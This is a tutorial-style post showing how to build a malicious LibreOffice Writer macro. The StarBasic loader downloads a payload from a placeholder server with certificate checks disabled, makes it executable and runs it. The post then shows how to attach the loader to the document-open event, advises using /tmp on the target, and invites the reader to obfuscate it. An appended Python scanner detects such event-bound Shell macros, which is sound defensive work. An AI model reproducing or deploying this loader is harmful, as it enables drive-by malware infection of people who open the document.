So, we all know it's stupid to open a document with unknown macros, right? Today we're gonna have some fun with malicious macros in LibreOffice Writer, just to show the concept of malware loaders in LibreOffice macros, so come on in and have a bit of fun :)
The first thing we need is a document, so open one and go to the macro editor. Next, make a macro like this one:
REM ***** BASIC *****
REM The Wait is needed: let the download finish before chmod and execute
Sub Main
Shell "bash -c 'wget https://PAYLOAD_SERVER_IP/PAYLOAD_FILE --no-check-certificate -O /DOWNLOAD_DIR/PAYLOAD_FILE'"
wait 10000
Shell "bash -c 'chmod +x /DOWNLOAD_DIR/PAYLOAD_FILE'"
Shell "bash -c '/DOWNLOAD_DIR/PAYLOAD_FILE &'"
End Sub
Save the macro and close the macro editor. The next part is to make it execute when the document is opened, and we do that like this:
1) Select the main menu "Tools:Customize..."
2) In the dialog that pops up, select the tab "Events"
3) There you can attach your macro to the "Document loading finished" event
(or "Open Document", "Activate Document", ...)
Save the document and try to open it; it should work and load the payload file. Now, remember that the download location and user rights have to fit, so find a place in the target system where you have read, write and execute rights; normally /tmp is a good starting point.
Yes, I know, it's pretty lame, but as a concept for showing why not to enable macros, it works wonders. And obfuscation is left as something for the reader to do :)
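From the defender's side, both halves of this trick are visible inside the saved file. The Python script below is an added example, not part of the original post: it opens a document as a ZIP, lists event bindings in content.xml that point at a macro stored in the document itself, and flags Basic module lines that call Shell. The sample documents, the event name office:load-finished, the href layout and the helper names are constructed assumptions.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET  # stdlib to stay dependency-free; defusedxml is safer on hostile files

SCRIPT_NS = "urn:oasis:names:tc:opendocument:xmlns:script:1.0"
XLINK_NS = "http://www.w3.org/1999/xlink"
SHELL_RE = re.compile(r"\bShell\b", re.I)
COMMENT_RE = re.compile(r"\s*(REM\b|')", re.I)

def scan_odf(data):
    """Report event-bound document macros (content.xml) and Basic lines that call Shell."""
    autorun, shell_calls = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name == "content.xml":
                for el in ET.fromstring(zf.read(name)).iter(f"{{{SCRIPT_NS}}}event-listener"):
                    href = el.get(f"{{{XLINK_NS}}}href", "")
                    if "location=document" in href:  # macro lives inside the file itself
                        autorun.append((el.get(f"{{{SCRIPT_NS}}}event-name"), href))
            elif name.startswith("Basic/") and name.endswith(".xml"):
                source = "".join(ET.fromstring(zf.read(name)).itertext())
                for line in source.splitlines():
                    if SHELL_RE.search(line) and not COMMENT_RE.match(line):
                        shell_calls.append((name, line.strip()))
    return {"autorun": autorun, "shell_calls": shell_calls, "suspicious": bool(autorun and shell_calls)}

def make_odf(content_xml, module_xml):
    """Build a minimal in-memory ODF-like zip (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("content.xml", content_xml)
        zf.writestr("Basic/Standard/Module1.xml", module_xml)
    return buf.getvalue()

# Constructed samples; the event name and href layout are assumptions about the saved XML.
EVENT = ('<script:event-listener script:language="ooo:script" script:event-name="office:load-finished" '
         'xlink:href="vnd.sun.star.script:Standard.Module1.Main?language=Basic&amp;location=document"/>')
CONTENT = ('<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
           f'xmlns:script="{SCRIPT_NS}" xmlns:xlink="{XLINK_NS}"><office:scripts>'
           '<office:event-listeners>%s</office:event-listeners></office:scripts></office:document-content>')
MODULE = ('<script:module xmlns:script="http://openoffice.org/2000/script" script:language="StarBasic">'
          "Sub Main\n%s\nEnd Sub</script:module>")
LOADER = make_odf(CONTENT % EVENT, MODULE % "Shell &quot;bash -c &apos;chmod +x /DOWNLOAD_DIR/PAYLOAD_FILE&apos;&quot;")
BENIGN = make_odf(CONTENT % "", MODULE % "REM Shell is not called here\nMsgBox &quot;hi&quot;")
if __name__ == "__main__":
    for label, doc in (("loader", LOADER), ("benign", BENIGN)):
        print(label, scan_odf(doc))
```

A hit on both lists is a strong reason to keep macro security at its strictest setting for that file; obfuscated Basic will evade the simple Shell match, so the event binding alone is worth reviewing.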
Have fun :)